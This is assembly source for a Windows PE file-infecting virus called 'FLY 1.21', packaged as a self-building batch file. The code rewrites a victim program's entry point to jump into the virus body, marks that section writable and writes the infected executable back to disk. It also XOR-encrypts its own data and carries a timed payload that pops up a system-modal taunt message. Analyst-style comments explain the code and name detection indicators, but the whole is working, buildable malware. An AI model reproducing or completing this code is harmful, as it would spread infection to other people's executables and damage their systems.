; save OEP
PUSH DWORD PTR [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
POP DWORD PTR [EDX + (OFFSET dwEPRva - OFFSET FLY_START)]
; save ImageBase
MOV EAX, b64Bit
DEC EAX
JZ ImageBase_is_qword
PUSH [EDI].IMAGE_NT_HEADERS.OptionalHeader.ImageBase
JMP @F
ImageBase_is_qword:
PUSH DWORD PTR [EDI.IMAGE_NT_HEADERS64.OptionalHeader.ImageBase]
@@:
POP EAX
MOV dwVictimBase, EAX
MOV [EDX + (OFFSET dwImageBase - OFFSET FLY_START)], EAX
; -> redirect EntryPoint, i.e.
; Victim_EntryPoint: PUSH virii_entry_VA (5 bytes)
; RET (6 bytes)
;INT 3
; find section belonging to the EntryPoint
PUSHAD
PUSH [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
MOVZX EAX, [EDI].IMAGE_NT_HEADERS.FileHeader.NumberOfSections
PUSH EAX
PUSH pFirstSecHdr
CALL RvaToSection ; EAX -> sec hdr to which the EntryPoint RVA refers
MOV [ESP].PUSHA_STRUCT._EAX, EAX
POPAD
TEST EAX, EAX
JZ cleanup_free_mem
; save bytes at EntryPoint
MOV EDX, [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
SUB EDX, [EAX].IMAGE_SECTION_HEADER.VirtualAddress
ADD EDX, [EAX].IMAGE_SECTION_HEADER.PointerToRawData ; EDX -> EntryPoint Offset
ADD EDX, ESI ; EDX -> EntryPoint Ptr
PUSH 6
MOV ECX, pVirusBody
ADD ECX, (OFFSET bEntryData - OFFSET FLY_START)
PUSH ECX
PUSH EDX
CALL memcpy
; assemble PUSH,RET at entry
MOV BYTE PTR [EDX], 068h
MOV ECX, VIRUS_OFFSET
ADD ECX, dwVictimBase
MOV DWORD PTR [EDX + 1], ECX
MOV BYTE PTR [EDX + 5], 0C3h
; set write flag in EntryPoint section
OR [EAX].IMAGE_SECTION_HEADER.Characteristics, 080000000h
;-> update NT hdrs
MOV [EDI].IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders, 01000h
LEA EAX, [EDI].IMAGE_NT_HEADERS.FileHeader.PointerToSymbolTable
MOV DWORD PTR [EAX], (FLY_TRADEMARK - OBFUSCATION_VAL)
ADD DWORD PTR [EAX], (OBFUSCATION_VAL)
; change EntryPoint
;PUSH dwRealHdrSize
;POP [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint
MOV EDX, [EDI].IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint ; EDX -> Entry RVA
; clear BoundImport because if it had been present we overwrote it with the virus body
LEA EDI, [EDI].IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[11 * 8].VirtualAddress
SUB EAX, EAX
STOSD
STOSD
;-> encrypt data parition
PUSHAD
MOV EBX, EDX
CALL GetXorByte ; arg pushed above
PUSH EAX
PUSH (Variable_Crypt_End - Variable_Crypt_Start)
LEA EAX, [ESI + (VIRUS_OFFSET + (Variable_Crypt_Start - FLY_START))]
PUSH EAX
CALL memxor
POPAD
;-> write mem to file
SUB EDI, EDI ; EDI -> 0
PUSH FILE_BEGIN
PUSH EDI
PUSH EDI
PUSH hFile
CALL [EBX + _SetFilePointer]
PUSH EDI
LEA EAX, dwc
PUSH EAX
MOV EAX, dwFSize
ADD EAX, dwHdrSizeDelta
PUSH EAX
PUSH ESI
PUSH hFile
CALL [EBX + _WriteFile]
cleanup_free_mem:
PUSH ESI
CALL [EBX + _GlobalFree]
cleanup_file_handle:
PUSH hFile
CALL [EBX + _CloseHandle]
InfectFile_exit:
POPAD
RET
InfectFile ENDP
;
; Args:
; [ESP + 4] - ptr to first section header
; [ESP + 8] - number of sections
; [ESP + C] - dwRVA
;
; Returns:
; NULL in case of an error or PIMAGE_SECTION_HEADER
;
; ReservedRegs: NO
;
RvaToSection:
; Scans the section table for the section whose virtual range contains the
; RVA in ARG_3 and returns its header pointer in EAX (0 if none matches).
; Scratch registers ESI, EDI, ECX, EDX, EBX and flags are overwritten; the
; caller in InfectFile wraps the call in PUSHAD/POPAD for that reason.
ARG_1 EQU [ESP + 4]
ARG_2 EQU [ESP + 8]
ARG_3 EQU [ESP + 12]
ASSUME ESI : PTR IMAGE_SECTION_HEADER
SUB EAX, EAX ; EAX = 0, the "not found" result
MOV ESI, ARG_1 ; ESI -> ptr to first section hdr
MOV ECX, ARG_2 ; ECX -> number of sections
MOV EDI, ARG_3 ; EDI -> target rva
SUB EBX, EBX ; EBX -> 0 (constant used by the VirtualSize == 0 test)
; NOTE(review): ARG_2 == 0 is not guarded; LOOP decrements before testing, so
; ECX would wrap and the scan would run far past the section table.
section_header_scan_loop:
MOV EDX, [ESI].VirtualAddress ; RVA >= VirtualAddress ?
CMP EDI, EDX
JB @F ; RVA is below this section -> try the next one
CMP [ESI].Misc.VirtualSize, EBX ; VS == 0 (needed for Watcom files)
JZ add_RawSize_instead
ADD EDX, [ESI].Misc.VirtualSize ; RVA < VirtualAddress + VirtualSize ?
JMP compare
add_RawSize_instead:
ADD EDX, [ESI].SizeOfRawData ; fall back to the raw size when VirtualSize is 0
compare:
CMP EDI, EDX ; unsigned compare: RVAs are unsigned offsets
JAE @F ; at or past the section end -> try the next one
JMP scan_done ; match: ESI -> section header, ECX is still > 0
@@:
ADD ESI, SIZEOF IMAGE_SECTION_HEADER
LOOP section_header_scan_loop ; falls through with ECX == 0 when nothing matched
ASSUME ESI : NOTHING
scan_done:
TEST ECX, ECX ; ECX == 0 only when the loop ran out of sections
JZ @F ; -> return EAX == 0 (NULL)
XCHG EAX, ESI ; found: EAX -> matching IMAGE_SECTION_HEADER
@@:
RET 12 ; callee pops the three DWORD args
;
; Args:
; [ESP + 4] - src
; [ESP + 8] - dest
; [ESP + C] - size
;
; ReservedRegs: ALL
;
memcpy:
; Copies ARG_3 bytes from ARG_1 (src) to ARG_2 (dest); note the src/dest
; argument order is the reverse of C memcpy.  All registers are preserved by
; PUSHAD/POPAD, which is why the arg offsets add SIZEOF PUSHA_STRUCT.
ARG_1 EQU [ESP + 4 + SIZEOF PUSHA_STRUCT]
ARG_2 EQU [ESP + 8 + SIZEOF PUSHA_STRUCT]
ARG_3 EQU [ESP + 12 + SIZEOF PUSHA_STRUCT]
PUSHAD
MOV ESI, ARG_1 ; ESI -> source
MOV EDI, ARG_2 ; EDI -> destination
MOV ECX, ARG_3 ; ECX = byte count (0 copies nothing)
REP MOVSB ; copy direction follows DF; no CLD here, so DF == 0 is assumed; overlap is not handled
POPAD
RET 12 ; callee pops the three DWORD args
;
; Args:
; [ESP + 4] - src
; [ESP + 8] - size
; [ESP + C] - xor byte
;
; ReservedRegs: ALL
;
memxor:
; XORs each of ARG_2 bytes at ARG_1 in place with the low byte of ARG_3.
; All registers are preserved by PUSHAD/POPAD, hence the SIZEOF PUSHA_STRUCT
; adjustment in the arg offsets.
; NOTE(review): LOOP decrements before testing, so ARG_2 == 0 wraps ECX and the
; loop would run over the whole address space; callers must pass a non-zero size.
ARG_1 EQU [ESP + 4 + SIZEOF PUSHA_STRUCT]
ARG_2 EQU [ESP + 8 + SIZEOF PUSHA_STRUCT]
ARG_3 EQU [ESP + 12 + SIZEOF PUSHA_STRUCT]
PUSHAD
MOV ESI, ARG_1 ; ESI -> data ptr
MOV ECX, ARG_2 ; ECX = byte count
MOV EAX, ARG_3 ; EAX -> xor byte (only AL is used)
memxor_loop:
XOR BYTE PTR [ESI], AL
INC ESI
LOOP memxor_loop
POPAD
RET 12 ; callee pops the three DWORD args
;
; this is the payload
;
; ReservedRegs: ALL
;
DriveUserNutsHiHi:
; Payload routine: once the system uptime reaches MIN_PAYLOAD_TICK, loads
; USER32 and shows a system-modal MessageBoxA with szMBText/szMBCaption.
; API pointers and strings are addressed EBP-relative (EBP = delta base into
; the variable block below); "USER32" is assembled on the stack instead of
; being stored as a string.
; NOTE(review): the header says ReservedRegs: ALL, but EAX, EBX and EDI are
; written here and the Win32 calls clobber ECX/EDX; confirm the caller's
; expectations.
; PC already MIN_PAYLOAD_TICK seconds up ?
CALL [EBP + _GetTickCount] ; EAX = milliseconds since boot, so MIN_PAYLOAD_TICK is in ms
CMP EAX, MIN_PAYLOAD_TICK
JB DriveUserNutsHiHi_exit ; not up long enough -> do nothing
; build "USER32\0" on stack
SUB ESP, 8
MOV EDI, ESP ; User32 str on stack
MOV DWORD PTR [EDI], "RESU" ; stored little-endian: 'U','S','E','R'
MOV DWORD PTR [EDI + 4], "23" ; stored as '3','2',0,0 -> NUL-terminated "USER32"
; get MessageBoxA addr
PUSH EDI
CALL [EBP + _LoadLibrary] ; EAX -> U32 base
ADD ESP, 8 ; release the stack string before any of the exits below
OR EAX, EAX
JZ DriveUserNutsHiHi_exit ; LoadLibraryA failed
LEA EDI, [EBP + MBStrSize] ; EDI -> API info (str size/str)
MOVZX EBX, BYTE PTR [EDI] ; EBX = length byte (11 + 1, i.e. including the NUL)
PUSH EBX ; length
INC EDI ; EDI -> "MessageBoxA"
PUSH EDI ; name
PUSH EAX ; module base
CALL GetProcAddr ; EAX -> MessageBoxA addr (GetProcAddr is defined outside this chunk; presumably resolves an export by name - confirm)
OR EAX, EAX
JZ DriveUserNutsHiHi_exit ; export not found
; show msg
PUSH MB_SYSTEMMODAL OR MB_ICONWARNING OR MB_TOPMOST ; uType
LEA EBX, [EBP + szMBCaption]
PUSH EBX ; lpCaption
LEA EBX, [EBP + szMBText]
PUSH EBX ; lpText
SUB EBX, EBX
PUSH EBX ; hWnd = NULL
CALL EAX ; MessageBoxA(NULL, szMBText, szMBCaption, uType); stdcall, callee pops the args
DriveUserNutsHiHi_exit:
RET
;
; Reserved Regs: NO
;
; Args:
; EBX - EntryPoint RVA
;
; Returns: xor byte to dexor loader data partition in EAX
;
GetXorByte:
; EAX = (sum of the four bytes of EBX) mod 256 - a one-byte key derived from
; the entry-point RVA the caller passes in EBX.  EBX is shifted down to 0,
; ECX ends at 0, flags are modified.
; Analyst note: because the key is a trivial function of a value kept in the
; PE header (the caller in InfectFile passes AddressOfEntryPoint), the
; memxor'ed variable block can be decoded statically from the header alone.
SUB EAX, EAX ; EAX = 0 (AL is the accumulator)
SUB ECX, ECX
ADD CL, 4 ; ECX = 4 bytes to fold
GetXorByte_loop:
ADD AL, BL ; accumulate the current low byte of EBX
SHR EBX, 8 ; move the next byte into BL
LOOP GetXorByte_loop
RET
; ------ VARIABLES ----------------------------------------------------------------------
Loader_Variables:
; Data block carried with the code.  Everything between Variable_Crypt_Start
; and Variable_Crypt_End is XORed in place by memxor (called from InfectFile
; with the GetXorByte key), so the plaintext API names and message strings
; below are only visible after that layer is removed.
dwEPRva DD 0 ; 0 in first generation
Variable_Crypt_Start:
dwImageBase DD 0 ; 0 in first generation
dwK32Base DD ? ; presumably the kernel32 base, filled at runtime by code outside this chunk - confirm
bEntryData DB 6 DUP (0FFh) ; the 6 original entry-point bytes saved by InfectFile (PUSH imm32 / RET overwrites them)
MBStrSize DB 11 + 1 ; length of "MessageBoxA" including the NUL; read by DriveUserNutsHiHi
szMB DB "MessageBoxA", 0
szMBText DB "You stink.", 0
szMBCaption DB "FLY 1.21", 0
; API table: each entry is a length byte (name length + NUL), a DWORD slot
; that receives the resolved address at runtime, then the NUL-terminated name.
; A zero length byte (dwcAPITableEnd) terminates the table.  Code addresses
; the slots as [EBX + _Name] in InfectFile and [EBP + _Name] in the payload.
API_table:
DB 20 + 1
_GetCurrentDirectory DD ?
szGetCurrentDirectory DB "GetCurrentDirectoryA", 0
DB 20 + 1
_SetCurrentDirectory DD ?
szSetCurrentDirectory DB "SetCurrentDirectoryA", 0
DB 14 + 1
_FindFirstFile DD ?
szFindFirstFile DB "FindFirstFileA", 0
DB 13 + 1
_FindNextFile DD ?
szFindNextFile DB "FindNextFileA", 0
DB 9 + 1
_FindClose DD ?
szFindClose DB "FindClose", 0
DB 11 + 1
_CreateFile DD ?
szCreateFile DB "CreateFileA", 0
DB 11 + 1
_CloseHandle DD ?
szCloseHandle DB "CloseHandle", 0
DB 11 + 1
_GetFileSize DD ?
szGetFileSize DB "GetFileSize", 0
DB 11 + 1
_GlobalAlloc DD ?
szGlobalAlloc DB "GlobalAlloc", 0
DB 10 + 1
_GlobalFree DD ?
szGlobalFree DB "GlobalFree", 0
DB 8 + 1
_ReadFile DD ?
szReadFile DB "ReadFile", 0
DB 9 + 1
_WriteFile DD ?
szWriteFile DB "WriteFile", 0
DB 14 + 1
_SetFilePointer DD ?
szSetFilePointer DB "SetFilePointer", 0
DB 12 + 1
_LoadLibrary DD ?
szLoadLibrary DB "LoadLibraryA", 0
DB 12 + 1
_GetTickCount DD ?
szGetTickCount DB "GetTickCount", 0
dwcAPITableEnd DB 0 ; terminator: zero length byte
API_table_end:
Loader_Variables_end:
Variable_Crypt_End:
FLY_END:
end Main
; ------ END ----------------------------------------------------------------------------
:MAKE
REM Build label of the self-assembling FLY.BAT polyglot: ML is run on this same
REM file; these batch lines sit after "end Main", so the assembler ignores them.
CLS
REM /c assemble only, /coff COFF object, /Gz stdcall, /Cp preserve identifier
REM case, /Zp1 byte-pack structures (matches the raw PE header layouts used).
\MASM32\BIN\ML /nologo /c /coff /Gz /Cp /Zp1 FLY.BAT
REM /SECTION:.text,REW marks the code section read/execute/WRITE. A writable
REM .text section is atypical for linker output and is a useful static indicator
REM for defenders; normal builds emit .text as read+execute only.
\MASM32\BIN\LINK /nologo /SUBSYSTEM:WINDOWS /SECTION:.text,REW FLY.obj
DEL *.OBJ
ECHO.
PAUSE
CLS